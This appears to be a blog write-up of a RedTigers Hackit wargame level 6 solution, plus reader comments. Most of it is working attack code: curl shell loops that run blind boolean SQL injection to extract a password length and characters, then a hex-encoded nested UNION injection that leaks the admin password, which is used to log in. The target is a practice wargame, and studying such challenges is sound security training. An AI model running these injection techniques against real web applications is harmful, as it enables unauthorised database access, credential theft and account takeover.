# RedTigers Hackit wargame: Level 6


# curl --silent --insecure --cookie-jar level6 --cookie level6 --request POST --data "password=6d795f6361745f736179735f6d656f776d656f77&level6login=Login" https://redtiger.dyndns.org/hackit/level6.php
                <b>Welcome to Level 6</b><br><br>
                Target: Get the first user in table level6_users with status 1<br>
                <br><br><br> <a href="?user=1">Click me</a><br><br><br>
                                <table style="border-collapse:collapse; border:1px solid black;">
                                <tr>
                                        <td>Username: </td>
                                        <td>deddlef</td>
                                </tr>
                                <tr>
                                        <td>Email: </td>
                                        <td>dumbi@damibi.de</td>
                                </tr>
                        </table>

                                        <br>
                        <form method="post">
                                Username: <input type="text" name="user"><br>
                                Password: <input type="text" name="password">
                                <input type="submit" name="login" value="Login">
                        </form>
                        <br>
# for i in `seq 1 30`; do echo $i; result=`curl --silent --insecure --cookie level6 "https://redtiger.dyndns.org/hackit/level6.php?user=0%20or%20if((select%20length(password)%20from%20level6_users%20where%20id=3)=$i,true,false)" | grep deddlef`; if [ "$result" != "" ]; then break; fi; done
1
2
3
4
5
6
7
8
9
10
11
# for i in `seq 1 11`; do for j in `echo {a..z} {0..9}`; do d=` printf "%d\n" \'$j`; result=`curl --silent --insecure --cookie level6 "https://redtiger.dyndns.org/hackit/level6.php?user=0%20or%20if((select%20ord(left(right(password,$[12-$i]),1))%20from%20level6_users%20where%20id=3)=$d,true,false)" | grep deddlef`; if [ "$result" != "" ]; then echo -n "$j"; break; fi; done; done; echo
6d306e737465726b316c6c
# query2="`echo -n "' union select id,username,email,password,status from level6_users where status=1 limit 1 -- " | xxd -p | tr -d '\n'`"
# query1="`echo -n \"0 union select 1,0x$query2,3,4,5\" | sed 's/ /%20/g'`"
# curl --silent --insecure --cookie level6 "https://redtiger.dyndns.org/hackit/level6.php?user=$query1" | grep -A 1 -e ">Username" -e Email
                                        <td>Username: </td>
                                        <td>admin</td>
--
                                        <td>Email: </td>
                                        <td>6d306e737465726b316c6c</td>
# curl --silent --insecure --cookie level6 --request POST --data "user=admin&password=6d306e737465726b316c6c&login=Login" https://redtiger.dyndns.org/hackit/level6.php | grep is:
<br>The password for the next level is: <b>646f6e745f73686f75745f61745f796f75725f6469736b73</b> <br><br>

3 comments:

Anonymous said...

DISABLED now: substring, substr, ( , ), mid

So it doesn't work anymore

Chorly said...

I'm not sure I understand the last query (query1 and query2), and I have no idea why it forces the password to appear.
Could you give me a little explanation of this?
Thanks :)

Anonymous said...

Your solution does not work anymore.
how to solve this?